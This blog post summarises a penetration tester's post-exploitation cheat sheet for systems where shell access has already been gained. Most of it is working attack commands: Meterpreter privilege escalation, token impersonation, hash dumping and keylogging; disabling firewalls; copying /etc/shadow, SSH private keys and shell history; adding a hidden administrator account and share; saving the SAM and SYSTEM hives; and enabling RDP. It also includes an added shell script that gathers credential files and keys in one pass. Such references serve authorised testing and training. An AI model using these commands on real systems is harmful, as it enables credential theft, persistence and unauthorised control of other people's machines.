Credit for most of what follows goes to Mubix, who has created a few documents (on Google Docs) listing what to actually do once shell access has been gained. You can read more about it here and find the links to the docs; I'm simply blogging about it to make a summary for myself.

Meterpreter Post Auth

Information Gathering

getuid
getpid
getprivs
sysinfo
screenshot
run winenum
run scraper
run checkvm
run credcollect
run get_local_subnets

winenum, scraper and credcollect are legacy Meterpreter scripts and are run without the .rb suffix; current Metasploit versions replace most of them with post/windows/gather/* modules (e.g. run post/windows/gather/checkvm).

Escalating Privs

ps, then migrate <pid> into a stable process running as the user you want (explorer.exe for the logged-on user)
getsystem

getsystem tries several local elevation techniques in turn and needs local admin rights to succeed; if it fails, escalate with a local exploit first.

Tokens (use incognito)

use incognito
list_tokens -u
impersonate_token DOMAIN\\user   (the backslash has to be doubled in the Meterpreter console)
steal_token <pid>
rev2self   (drop the impersonated token and go back to the original one)

Retrieve Passwords

hashdump
run post/windows/gather/cachedump
run post/windows/gather/smart_hashdump
run post/windows/gather/credentials/vnc

hashdump and the hash-dumping post modules need SYSTEM, so getsystem or steal a SYSTEM token first. cachedump returns cached domain logon hashes (MSCache), which can be cracked but not passed.

Session

enumdesktops
getdesktop
setdesktop <id>
uictl disable keyboard   (uictl enable keyboard to undo; the same works for mouse)

Keylog

keyscan_start
keyscan_dump
keyscan_stop

Nix Post Auth

Disable Firewall

iptables-save > /root/firewall.rules     # back up the live rule set first
/etc/init.d/iptables save                # RHEL/CentOS init script; writes /etc/sysconfig/iptables
/etc/init.d/iptables stop                # flushes the rules and resets the policies to ACCEPT
iptables-restore < /root/firewall.rules  # put the rules back when you are done

Stopping the firewall leaves the host wide open and is easy to notice, so keep the backup and restore it before leaving.

Files to pull

/etc/passwd
/etc/shadow OR /etc/security/passwd (on AIX)
/etc/group OR /etc/gshadow
/home/*/.ssh/id* and /root/.ssh/id*
/etc/sudoers

User Information

grep ^ssh /home/*/.*hist* /root/.*hist*
grep ^telnet /home/*/.*hist* /root/.*hist*
grep ^mysql /home/*/.*hist* /root/.*hist*

History files give you the hosts a user connects to and, now and then, a password typed on the command line (mysql -pSecret).
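The two Nix lists above (files to pull, history grep) as one script. This is an added example, not from the cheat sheet or from Mubix's docs; the paths are the ones listed above, while ROOT, OUT and the function names are this example's own. ROOT is a path prefix so the script can be dry-run against a staging tree; leave it empty on a real target and run it as root.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): pull the account files, SSH keys
# and interesting history lines from a Unix host in one pass.
# ROOT prefixes every path so the script can be tested against a fake tree;
# "" means the live filesystem. ROOT, OUT and the function names are
# this example's own choices.
ROOT="${ROOT:-}"
OUT="${OUT:-/tmp/loot.$$}"   # where copies are staged

# Copy $ROOT$1 under $OUT, keeping the path. Returns 1 if unreadable
# (e.g. /etc/shadow without root), so callers can count what they got.
grab() {
    src="$ROOT$1"
    [ -r "$src" ] || return 1
    mkdir -p "$OUT$(dirname "$1")"
    cp "$src" "$OUT$1"
}

# Account files; shadow lives in /etc/security/passwd on AIX, so try both.
pull_account_files() {
    n=0
    for f in /etc/passwd /etc/shadow /etc/security/passwd \
             /etc/group /etc/gshadow /etc/sudoers; do
        grab "$f" && n=$((n + 1))
    done
    echo "$n"
}

# SSH keys (id_* private keys and their .pub files) from every home plus root's.
pull_ssh_keys() {
    n=0
    for k in "$ROOT"/home/*/.ssh/id* "$ROOT"/root/.ssh/id*; do
        [ -f "$k" ] || continue          # an unmatched glob stays literal
        grab "${k#"$ROOT"}" && n=$((n + 1))
    done
    echo "$n"
}

# History lines that start with ssh/telnet/mysql: remote hosts, and
# passwords given on the command line (mysql -pSecret).
grep_history() {
    cat "$ROOT"/home/*/.*hist* "$ROOT"/root/.*hist* 2>/dev/null |
        grep -E '^(ssh|telnet|mysql)[[:space:]]'
}

count_history_hits() {
    grep_history | grep -c .
}

collect_loot() {
    mkdir -p "$OUT"
    echo "account files copied: $(pull_account_files)"
    echo "ssh keys copied:      $(pull_ssh_keys)"
    grep_history > "$OUT/history_hits.txt" || true
    echo "history hits:         $(count_history_hits) (see $OUT/history_hits.txt)"
    echo "staged under $OUT"
}

# Usage: sh loot.sh run                          (as root, on the target)
#        ROOT=/tmp/fake OUT=/tmp/out sh loot.sh run   (dry run against a fake tree)
case "${1:-}" in run) collect_loot ;; esac
```

The counts tell you what you did not get: if pull_account_files reports fewer than you expect, /etc/shadow or /etc/sudoers was not readable and you need to escalate before pulling again.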

Windows Post Auth

Get current logged in user

echo %USERNAME%
whoami   (also shows the domain, as DOMAIN\user)

Add user

net user pentest password /add
net localgroup administrators pentest /add

Add share

net share nothing$=C:\ /grant:pentest,FULL /unlimited   (the trailing $ hides the share from browsing)

Disable Firewall

netsh firewall set opmode disable                  (XP/2003)
netsh advfirewall set allprofiles state off        (Vista and later)

Auto Start Directories

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\          (all users, Vista and later)
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\               (current user, Vista and later)
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\       (XP/2003)
C:\WINDOWS\Start Menu\Programs\StartUp\                                (9x)
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\               (NT4)

Accounts and Policies

net localgroup administrators OR net localgroup administrators /domain
net group "Domain Admins" /domain
net accounts OR net accounts /domain

net accounts shows the lockout threshold and duration; read it before any password guessing.

Files to pull

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\SECURITY security.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive

The live hives under System32\config are locked while Windows runs, which is why reg save (admin required) is used; take SYSTEM along with SAM, since the SAM hashes are encrypted with a key derived from it. The repair\ copies come from the XP/2003 setup and are often stale, and RegBack is no longer populated from Windows 10 1803 onwards.

Enable Remote Desktop

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes   (open port 3389 in the Windows firewall)

Should you wish to have all this useful info (as well as an ascii table) then feel free to use the following wallpaper (1920×1200).

Or customize the GIMP XCF file yourself.
